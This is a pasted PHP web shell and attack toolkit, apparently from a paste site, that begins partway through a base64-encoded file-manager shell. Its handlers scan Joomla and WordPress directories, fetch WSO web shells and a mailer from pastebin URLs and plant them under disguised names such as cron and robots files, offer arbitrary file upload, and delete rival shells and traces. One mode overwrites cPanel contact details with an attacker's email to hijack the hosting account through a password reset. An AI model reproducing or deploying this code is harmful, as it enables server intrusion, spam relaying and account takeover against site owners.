lwZT1cImhpZGRlblwiIG5hbWU9XCJ0eXBlXCIgdmFsdWU9XCJkaXJcIj4KICAgICAgICA8aW5wdXQgdHlwZT1cImhpZGRlblwiIG5hbWU9XCJuYW1lXCIgdmFsdWU9XCIkZGlyXCI+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwicGF0aFwiIHZhbHVlPVwiJHBhdGgvJGRpclwiPgogICAgICAgIDxpbnB1dCB0eXBlPVwic3VibWl0XCIgdmFsdWU9XCI+XCIgLz4KICAgICAgICA8L2Zvcm0+PC9jZW50ZXI+PC90ZD4KICAgICAgICA8L3RyPiI7CiAgICB9CiAgICBlY2hvICc8dHIgY2xhc3M9ImZpcnN0Ij48dGQ+PC90ZD48dGQ+PC90ZD48dGQ+PC90ZD48dGQ+PC90ZD48L3RyPic7CiAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRmaWxlKXsKICAgICAgICBpZighaXNfZmlsZSgiJHBhdGgvJGZpbGUiKSkgY29udGludWU7CiAgICAgICAgJHNpemUgPSBmaWxlc2l6ZSgiJHBhdGgvJGZpbGUiKS8xMDI0OwogICAgICAgICRzaXplID0gcm91bmQoJHNpemUsMyk7CiAgICAgICAgaWYoJHNpemUgPj0gMTAyNCl7CiAgICAgICAgICAgICRzaXplID0gcm91bmQoJHNpemUvMTAyNCwyKS4nIE1CJzsKICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgJHNpemUgPSAkc2l6ZS4nIEtCJzsKICAgICAgICB9CgogICAgICAgIGVjaG8gIjx0cj4KICAgICAgICA8dGQ+PGEgaHJlZj1cIj9maWxlc3JjPSRwYXRoLyRmaWxlJnBhdGg9JHBhdGhcIj4kZmlsZTwvYT48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPiIuJHNpemUuIjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+IjsKICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSkgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj4nOwogICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPic7CiAgICAgICAgZWNobyBwZXJtcygiJHBhdGgvJGZpbGUiKTsKICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzwvZm9udD4nOwogICAgICAgIGVjaG8gIjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+PGZvcm0gbWV0aG9kPVwiUE9TVFwiIGFjdGlvbj1cIj9vcHRpb24mcGF0aD0kcGF0aFwiPgogICAgICAgIDxzZWxlY3QgbmFtZT1cIm9wdFwiPgoJICAgIDxvcHRpb24gdmFsdWU9XCJcIj48L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwiZGVsZXRlXCI+RGVsZXRlPC9vcHRpb24+CiAgICAgICAgPG9wdGlvbiB2YWx1ZT1cImNobW9kXCI+Q2htb2Q8L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwicmVuYW1lXCI+UmVuYW1lPC9vcHRpb24+CiAgICAgICAgPG9wdGlvbiB2YWx1ZT1cImVkaXRcIj5FZGl0PC9vcHRpb24+CiAgICAgICAgPC9zZWxlY3Q+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwidHlwZVwiIHZhbHVlPVwiZmlsZVwiPgogICAgICAgIDxpbnB1dCB0eXBlPVwiaGlkZGVuXCIgbmFtZT1cIm5hbWVcIiB2YWx1ZT1cIiRmaWxlXCI+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwicGF0aFwiIHZhbHVlPVwiJHBhdGgvJGZpbGVcIj4KICAgICAgICA8aW5wdXQgdHlwZT1cInN1Ym1pdFwiIHZhbHVlPVwiPlwiIC8+CiAgICAgICAgPC9mb3JtPjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPC90cj4iOwogICAgfQogICAgZWNobyAnPC90YWJsZT4KICAgIDwvZGl2Pic7Cn0KZWNobyAnPGJyLz4KPC9CT0RZPgo8L0hUTUw+JzsKZnVuY3Rpb24gcGVybXMoJGZpbGUpewogICAgJHBlcm1zID0gZmlsZXBlcm1zKCRmaWxlKTsKCmlmICgoJHBlcm1zICYgMHhDMDAwKSA9PSAweEMwMDApIHsKICAgIC8vIFNvY2tldAogICAgJGluZm8gPSAncyc7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHhBMDAwKSA9PSAweEEwMDApIHsKICAgIC8vIFN5bWJvbGljIExpbmsKICAgICRpbmZvID0gJ2wnOwp9IGVsc2VpZiAoKCRwZXJtcyAmIDB4ODAwMCkgPT0gMHg4MDAwKSB7CiAgICAvLyBSZWd1bGFyCiAgICAkaW5mbyA9ICctJzsKfSBlbHNlaWYgKCgkcGVybXMgJiAweDYwMDApID09IDB4NjAwMCkgewogICAgLy8gQmxvY2sgc3BlY2lhbAogICAgJGluZm8gPSAnYic7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHg0MDAwKSA9PSAweDQwMDApIHsKICAgIC8vIERpcmVjdG9yeQogICAgJGluZm8gPSAnZCc7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHgyMDAwKSA9PSAweDIwMDApIHsKICAgIC8vIENoYXJhY3RlciBzcGVjaWFsCiAgICAkaW5mbyA9ICdjJzsKfSBlbHNlaWYgKCgkcGVybXMgJiAweDEwMDApID09IDB4MTAwMCkgewogICAgLy8gRklGTyBwaXBlCiAgICAkaW5mbyA9ICdwJzsKfSBlbHNlIHsKICAgIC8vIFVua25vd24KICAgICRpbmZvID0gJ3UnOwp9CgovLyBPd25lcgokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDEwMCkgPyAncicgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA4MCkgPyAndycgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA0MCkgPwogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDgwMCkgPyAncycgOiAneCcgKSA6CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwODAwKSA/ICdTJyA6ICctJykpOwoKLy8gR3JvdXAKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMjApID8gJ3InIDogJy0nKTsKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMTApID8gJ3cnIDogJy0nKTsKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMDgpID8KICAgICAgICAgICAgKCgkcGVybXMgJiAweDA0MDApID8gJ3MnIDogJ3gnICkgOgogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDQwMCkgPyAnUycgOiAnLScpKTsKCi8vIFdvcmxkCiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDA0KSA/ICdyJyA6ICctJyk7CiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAyKSA/ICd3JyA6ICctJyk7CiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAxKSA/CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwMjAwKSA/ICd0JyA6ICd4JyApIDoKICAgICAgICAgICAgKCgkcGVybXMgJiAweDAyMDApID8gJ1QnIDogJy0nKSk7CgogICAgcmV0dXJuICRpbmZvOwp9Cj8+');
- $save=fopen('lite.php','w');
- fwrite($save,$al7wa);
- fclose($save);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$url/lite.php"." target="."_blank".">www.$azzouz/lite.php"."</a><br>";
- }
- ////////////
- if(isset($_GET['ls'])){
- $gg= $_GET["ls"];
- if(eregi("array",$gg)){$namex = 'array';
- }
- else{$namex = 'ch';
- }
- $dexter = dirname($_SERVER["PHP_SELF"]); $dirname = "__/$dexter";
- $dgh=str_replace(array("__/////","__////","__///","__//","__/"), "",$dirname);
- echo "
- <center>
- <br>
- <form style='margin-top: -140px;'method='POST'>
- <textarea style='width: 400px;height: 300px;margin: 0px;'placeholder='' name='config'>administrator
- components
- help
- includes
- language
- manifests
- modules
- plugins
- media
- templates
- cache
- cli
- components/com_foxcontact
- components/com_jce
- components/com_users
- components/com_wrapper
- components/com_xmap
- components/error_log
- libraries/cms
- libraries/joomla
- media/cms
- media/com_finder
- media/com_foxcontact
- media/contacts
- media/editors
- media/jce
- media/mailto
- media/media
- plugins/captcha
- plugins/content
- plugins/editors
- plugins/extension
- plugins/finder
- plugins/search
- plugins/system
- plugins/user
- templates/atomic
- templates/beez5
- wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader
- wp-content/plugins/woocommerce-products-filter/lib
- wp-content/plugins/woocommerce-products-filter
- wp-content/plugins
- wp-content/uploads
- wp-content/upgrade
- wp-content/languages
- wp-content/themes
- wp-content/mu-plugins
- wp-content
- public_html
- $dgh</textarea><br><br>
- <input type='submit' name='$namex' value='Submit'><br>
- </form>
- ";
- unlink('a.txt');
- unlink('php.txt');
- unlink('other.txt');
- unlink('f.txt');
- //---------------------------------------------------------------------
- $block = array ('view','system','cron','wp-multipart.php','king.php','endurance-browser-cache.php','submitticket.php','ssv3_directory.php','mk_conf.php','connect.php','config.txt.php','conf_global.php','endurance-page-cache.php','advanced-cache.php','endurance-browser-cache.php','wp-views.php','ls.php','users.php','configuration','application.php','defines.php','framework.php','menu.php','pathway.php','router.php','controller.php','foxcontact.php','wrapper.php','displayer.php','jce.php','xmap.php','factory.php','methods.php','useragent','offline','api','action.php','index.php','hello.php','akismet.php','aq_resizer.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config-sample.php','wp-config.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','error.php','platform.php','cms.php','import.php','loader.php','finder_indexer.php','garbagecron.php','update_cron.php','setup.php','output.php','ini.php','authorze.php','component.php');
- //---------------------------------------------------------------------
- if($_POST['array']){
- $haxor = $_POST['config'];
- $ex=explode("\r\n",$haxor);
- $total = count($ex);
- echo "<center>Total : <font color = 'red'>$total</font><br></center>";
- echo "<br><br><font color = 'blue'>array </font>(";
- foreach($ex as $sexter){
- echo "'";
- echo "<font color = 'red'>$sexter</font>";
- echo "',";
- }
- echo ");";
- }
- if($_POST['ch']){
- $haxor = $_POST['config'];
- $ex=explode("\r\n",$haxor);
- $total = count($ex);
- echo "<center>Total : <font color = 'red'>$total</font><br></center>";
- $dir=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../','../../../../../../../','../../../../../../../../');
- foreach($dir as $find){
- foreach($ex as $sexter){
- $p1 = $find.$sexter;
- if (file_exists("$p1")){
- $files1 = scandir($p1);
- foreach ($files1 as $file){
- $kingdom = $p1."/".$file;
- $site=str_replace(array("\\/","../","./","//","public_html/"), "",$kingdom);
- $filter = fopen("f.txt", 'a+');
- fwrite($filter, "$site\r\n");
- fclose($filter);
- }
- }
- }
- }
- $emails=@file_get_contents('f.txt');
- $ex = explode("\n",$emails);
- $count = count($ex);
- if(isset($emails)&&$count>=1){
- }
- else{
- echo "<br> List not correct <br>";
- exit;}
- echo "<br> [<font color = 'red'>$count</font>] ";
- if(isset($emails)){
- for($i=0;$i<=$count;$i++){
- $d = strtolower($ex[$i]);
- if(strstr($d,".php")){
- $frr.=$d;
- $fr = $fr + 1;
- }
- else{
- $ather .=$d;
- $nn=$nn + 1;
- }
- }
- }
- if($fr){
- echo "[<font color = 'red'>$fr</font>] ";
- $open=fopen("php.txt",'ab');
- fwrite($open,"$frr\r\n");
- fclose($open);
- }
- echo "[<font color = 'red'>$nn</font>] <br><br>";
- $open=fopen("other.txt",'ab');
- fwrite($open,"$ather\r\n");
- fclose($open);
- $getlist=@file_get_contents('php.txt');
- $ex=explode("\r",$getlist);
- $haxor = array_unique($ex);
- echo "<div style='font-size: 15px; line-height: 25px;'>";
- foreach ($haxor as $site){
- $regex = '('.implode($block, ')|(').')';
- if(eregi($regex,$site)){
- }
- else {
- $sa=fopen('a.txt','ab');
- fwrite($sa,"$site"."\r\n");
- fclose($sa);
- }
- }
- $sez = $_SERVER["SERVER_NAME"];
- $old=explode("\r\n",@file_get_contents('a.txt'));
- $ex_old = array_unique($old);
- $dexter = file_get_contents('a.txt');
- $total = count($old);
- $ggg= $_GET["ls"];
- if(eregi("url",$ggg)){
- echo"<center>
- <table style='width: 30%'>
- <tr>
- <td><center><?echo $nt;?></center><textarea name='othersx' cols='30' rows='10' style='width: 400px;height: 180px;margin: 0px;'>";
- foreach ($ex_old as $site){
- echo "$sez/$site\r\n";
- }
- echo"</textarea></td>
- </tr>
- </table>
- </center>";
- echo "<br><center>Total : <font color = 'red'>$total</font><br></center>";
- }
- else {
- echo"<center>
- <table style='width: 30%'>
- <tr>
- <td><center><?echo $nt;?></center><textarea name='othersx' cols='30' rows='10' style='width: 400px;height: 180px;margin: 0px;'>
- $dexter
- </textarea></td>
- </tr>
- </table>
- </center>";
- echo "<br><center>Total : <font color = 'red'>$total</font><br></center>";
- }
- foreach ($ex_old as $site){
- echo "<br><a href='http://$sez/$site' target='_blank' style='text-decoration: blink;'>$sez/$site</a>";
- }
- echo "</div>";
- }
- echo'</center>';
- }
- //////////////
- if(isset($_GET["random"])){
- $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
- foreach($sss as $pa){
- $p1=array("$pa/cli/");
- foreach($p1 as $path){
- if (file_exists("$path")){
- $print = $path."cron".rand(999, 123).".php";
- $html = @file_get_contents('https://pastebin.com/raw/jWBjgLd2'); //Mailer
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
- break;
- }
- $p2=array("$pa/includes/");
- foreach($p2 as $path){
- if (file_exists("$path")){
- $print = $path."cron".rand(999, 123).".php";
- $html = @file_get_contents('https://pastebin.com/raw/jWBjgLd2'); //Mailer
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
- }}
- }
- //////
- $p3=array("$pa/plugins/user/");
- foreach($p3 as $path){
- if (file_exists("$path")){
- $print = $path."system".rand(999, 123).".php";
- $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA'); // WSO v2.6
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- break;
- }
- $p4=array("$pa/plugins/");
- foreach($p4 as $path){
- if (file_exists("$path")){
- $print = $path."system".rand(999, 123).".php";
- $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA'); // WSO v2.6
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- }}
- }
- //////
- $p5=array("$pa/libraries/cms/");
- foreach($p5 as $path){
- if (file_exists("$path")){
- $print = $path."view".rand(999, 123).".php";
- $html = @file_get_contents('https://pastebin.com/raw/wL527WWg'); // WSO v2.5
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- break;
- }
- $p6=array("$pa/libraries/");
- foreach($p6 as $path){
- if (file_exists("$path")){
- $print = $path."view".rand(999, 123).".php";
- $html = @file_get_contents('https://pastebin.com/raw/wL527WWg'); // WSO v2.5
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- }}
- }
- }
- }
- if(isset($_GET["presta"])){
- $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
- foreach($sss as $pa){
- $p1=array("$pa/cache/");
- foreach($p1 as $path){
- if (file_exists("$path"))
- {
- /////////////////////////////////////
- $wtf1 = "$path"."authorze.php";
- $wtf2 = "$path"."setup.php";
- $wtf3 = "$path"."output.php";
- $wtf4 = "$path"."manager.php";
- /////////////////////////////////////
- $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
- $save=fopen($wtf1,'w');
- fwrite($save,$html);
- //////////////////////////////////////
- $zz = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
- $gg=fopen($wtf2,'w');
- fwrite($gg,$zz);
- /////////////////////////////////////
- $zzt = @file_get_contents('https://pastebin.com/raw/wL527WWg');
- $ggt=fopen($wtf3,'w');
- fwrite($ggt,$zzt);
- /////////////////////////////////////
- $ert = $multipart;
- $fgh=fopen($wtf4,'w');
- fwrite($fgh,$ert);
- }}
- }
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/manager.php"." target="."_blank".">www.$azzouz/cache/manager.php"."</a><br>";
- echo "----------------------------------------------------------------------------------------------------<br>";
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/output.php"." target="."_blank".">www.$azzouz/cache/output.php"."</a><br>";
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/authorze.php"." target="."_blank".">www.$azzouz/cache/authorze.php"."</a><br>";
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/setup.php?pass=ransomware"." target="."_blank".">www.$azzouz/cache/setup.php"."</a><br>";
- echo "----------------------------------------------------------------------------------------------------<br>";
- }
- if(isset($_GET["dexter"]))
- {
- $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
- $setup = "htaccess.php";
- $set=fopen($setup,'w');
- fwrite($set,$html);
- $mailer = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
- $authorze = "pagebreak.php";
- $auth=fopen($authorze,'w');
- fwrite($auth,$mailer);
- $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
- $uio = "robots.php";
- $cvb=fopen($uio,'w');
- fwrite($cvb,$ghjk);
- echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/htaccess.php"." target="."_blank".">www.$url/htaccess.php"."</a><br>";
- echo "<font style='color:#9c0000'>[+] </font><a style='color:#5a3ab7' href="."http://$url/pagebreak.php?pass=ransomware"." target="."_blank".">www.$url/pagebreak.php"."</a><br>";
- echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/robots.php"." target="."_blank".">www.$url/robots.php"."</a><br>";
- echo "----------------------------------------------------------------------------------------------------<br>";
- }
- if(isset($_GET["upload"]))
- {
- echo '<center><font color="Red" size="4">';
- /// Script Upload By dexter \\\
- if(isset($_POST['Submit'])){
- $filedir = "";
- $maxfile = '2000000';
- $mode = '0644';
- $userfile_name = $_FILES['image']['name'];
- $userfile_tmp = $_FILES['image']['tmp_name'];
- if(isset($_FILES['image']['name'])) {
- $qx = $filedir.$userfile_name;
- @move_uploaded_file($userfile_tmp, $qx);
- @chmod ($qx, octdec($mode));
- echo" <a href=$userfile_name><center><b>Sucess Upload $userfile_name</b></center></a>";
- }
- }
- else{
- echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
- }
- echo '</center></font>';
- }
- if(isset($_GET["kill"]))
- {
- unlink('a.txt');
- unlink('php.txt');
- unlink('other.txt');
- unlink('f.txt');
- $azazaz=array("lite.php","cmd.php","remote.php","ls.php","mw.php","m.php","w.php","ww.php","baa.php","pr.php","check.php","index1.php","index2.php","shl.php","ex.php","exx.php","w.php","XMX.php","zaaz.php","k.php","etc.php","222.php","list.txt","leafpw.php","aminox.php","x","zeb.php","1.php","cgi.php","root.php","py.php","gat.php","leaf.php","masss.php","ox.php","tim.php","sh.php","tazz.php","up.php","abderahim-zamolix.php","emails.php","s.php","zaz.php","zeubda.php","K7.php","zabi.php","plugin.php","olux.php","Rebel.php","shell.php","wso.php","upload.php","mailer.php","phpleafmailer.php","wget.php","melex1.php","cvv.php","hous.zip","x.php","spam.php","indoxploit.php","config.php","1337w0rm.php","sym.php","bt.php","amine.php","mama.php","uploader.php","hous.php","ok.php");
- foreach($azazaz as $zamla){
- if (!unlink($zamla)) { echo ("");}
- $l97ba = "modules/$zamla";
- if (!unlink($l97ba)) { echo ("");}
- $l97ba = "../$zamla";
- if (!unlink($l97ba)) { echo ("");}
- $l97ba = "../../$zamla";
- if (!unlink($l97ba)) { echo ("");}
- $l97ba = "../modules/$zamla";
- if (!unlink($l97ba)) { echo ("");}
- $l97ba = "./$zamla";
- if (!unlink($l97ba)) { echo ("");}
- }
- $jj = basename($_SERVER['SCRIPT_NAME']);
- $az6 = "ms-authorze.zip";
- $az7 = "../../ms-authorze.zip";
- $az8 = "../../../../ms-authorze.zip";
- $az0 = "wp-multipart.php";
- $az1 = "../wp-multipart.php";
- $az2 = "../../wp-multipart.php";
- $az3 = "../../../wp-multipart.php";
- $az4 = "../../../../wp-multipart.php";
- $az5 = "../../../../../wp-multipart.php";
- $az00 = "cache/./multipart.php";
- $az9 = "cache/../multipart.php";
- $az10 = "cache/../../multipart.php";
- $az11 = "cache/../../../multipart.php";
- $az12 = "cache/../../../../multipart.php";
- if (!unlink($jj))
- {
- echo ("failed<br>");
- }else
- {
- echo ("Sucess<br>");
- }
- if (!unlink($az1)) { echo ("");}
- if (!unlink($az2)) { echo ("");}
- if (!unlink($az3)) { echo ("");}
- if (!unlink($az4)) { echo ("");}
- if (!unlink($az5)) { echo ("");}
- if (!unlink($az0)) { echo ("");}
- if (!unlink($az6)) { echo ("");}
- if (!unlink($az7)) { echo ("");}
- if (!unlink($az8)) { echo ("");}
- if (!unlink($az00)) { echo ("");}
- if (!unlink($az9)) { echo ("");}
- if (!unlink($az10)) { echo ("");}
- if (!unlink($az11)) { echo ("");}
- if (!unlink($az12)) { echo ("");}
- $rr=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
- foreach($rr as $tt){
- $uu=array("$tt/wp-admin/","$tt/wp-includes/","$tt/cache/");
- foreach($uu as $oo){
- if (file_exists("$oo"))
- {
- $s1 = "$oo"."ms-kzip.php";
- $s2 = "$oo"."ms-authorze.zip";
- $s3 = "$oo"."manager.php";
- $s4 = "$oo"."ms-authorze.zip";
- if (!unlink($s1)) { echo ("");}
- if (!unlink($s2)) { echo ("");}
- if (!unlink($s3)) { echo ("");}
- if (!unlink($s4)) { echo ("");}
- }}
- }
- }
- if(isset($_GET["reset"]))
- {
- $site = $_SERVER['HTTP_HOST'];
- $ips = getenv('REMOTE_ADDR');
- $filt = getcwd();
- $fuck = explode("/",$filt);
- $user = $fuck[2];
- $email = "dexterkh1212x@gmail.com";
- $wr = 'email:'.$email;
- $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
- fwrite($f, $wr);
- fclose($f);
- $f = fopen('/home/'.$user.'/.contactinfo', 'w');
- fwrite($f, $wr);
- fclose($f);
- $parm = $site.':2083/resetpass?start=1';
- echo "<br> $parm<br>";
- $parm = $ips.':2083/resetpass?start=1';
- echo "<br> $parm<br>";
- $toba = __file__;
- echo "<br> $toba<br>";
- }
Add Comment
Please, Sign In to add comment